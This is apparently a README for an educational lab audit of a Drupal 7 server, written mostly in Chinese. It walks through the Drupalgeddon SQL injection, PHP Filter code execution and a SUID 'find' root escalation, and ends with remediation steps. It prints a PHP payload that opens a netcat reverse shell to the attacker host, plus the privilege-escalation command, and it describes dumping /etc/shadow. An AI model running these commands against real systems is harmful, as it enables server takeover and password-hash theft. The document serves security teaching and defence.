
Audit de sécurité Black Box d'un serveur Drupal 7. Démonstration d'une Kill Chain complète : Injection SQL (CVE-2014-3704) ➔ RCE ➔ Reverse Shell ➔ Escalade vers Root (SUID). Ce dépôt contient le rapport technique détaillé, les preuves d'exploitation (PoC) et les mesures de remédiation pour sécuriser l'infrastructure.
本项目是在受控且隔离的实验室环境中为教育和学术目的而完成的。未针对任何真实基础设施。目标是通过理解攻击机制来学习如何保护系统。
本项目的目标是进行一次黑盒审计。这意味着分析在没有任何目标先验知识的情况下开始:未提供任何凭据、技术文档或源代码。
基础设施已在 VMware 上虚拟部署于一个隔离的私有网络(仅主机模式)中,以避免与外界交互。
192.168.78.131
192.168.78.132
第一步是通过端口扫描来绘制目标机器的攻击面。
执行命令: nmap -sV 192.168.78.132

发现的服务:
对 Web 服务(端口 80)和 robots.txt 文件的分析揭示了 CMS Drupal 的存在。对源代码的检查发现了一个过时的版本:Drupal 7.x。
侦察阶段的结果显示了一个关键的攻击面:一个未维护的 CMS Drupal 7。该版本历史上以存在重大安全漏洞(尤其是 "Drupalgeddon")而闻名。
基于这一发现,审计转向了针对公开漏洞(CVE)的定向搜索。这一枚举确认了一条完整的利用链的存在,使得从一名简单的 Web 访问者升级到系统 "Root" 管理员成为可能。
已识别的攻击向量:
利用漏洞 CVE-2014-3704(Drupalgeddon)。Drupal 数据库 API 中的这一漏洞允许在无需认证的情况下注入 SQL 命令。
users 表中注入一个具有管理员权限的新用户。
一旦以管理员身份登录,使用原生模块 PHP Filter。该模块配置不当,允许在网站页面中执行任意 PHP 代码。
<?php system('nc -e /bin/bash 192.168.78.131 4444'); ?>www-data)。
分析具有 SUID(设置用户 ID)权限的文件。发现 find 命令上的一个关键配置。
find . -exec '/bin/sh' \;find 二进制文件以 root 身份执行,启动一个具有 Root (uid=0) 权限的 shell。一旦获得 root 访问权限,读取敏感文件 /etc/shadow 以渗漏用户密码的哈希值。

审计揭示了一个严重的风险等级。过时的 CMS 与系统配置疏忽(SUID)的结合导致了服务器的完全沦陷。
对企业的影响:
/etc/shadow)。优先行动计划:
chmod u-s /usr/bin/find)。如需完整技术细节、所用脚本及深入分析,请查阅完整报告: 阅读审计报告 (PDF)
Fabien MOINE